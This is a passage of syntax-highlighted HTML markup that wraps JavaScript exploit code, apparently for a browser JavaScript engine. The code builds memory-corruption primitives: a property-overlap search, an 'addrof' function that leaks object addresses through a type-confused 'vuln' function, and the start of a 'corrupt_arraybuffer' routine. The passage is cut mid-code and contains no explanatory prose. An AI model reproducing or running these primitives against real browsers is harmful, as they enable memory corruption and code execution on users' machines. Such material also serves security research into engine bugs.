class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">propertyNames<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">', '<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MAX_ITERATIONS<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">make<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-84\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">NUM_PROPERTIES<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-88\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-91\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">fail<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Failed to find overlapping properties&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-94\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">inline<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-103\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">x1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.37<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.38<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">y1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-107\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MAX_ITERATIONS<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">make<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">propertyValues<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-111\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.37<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toBigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-114\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">fail<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;Addrof failed&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-117\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">corrupt_arraybuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">victim<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">newValue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vuln<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span 
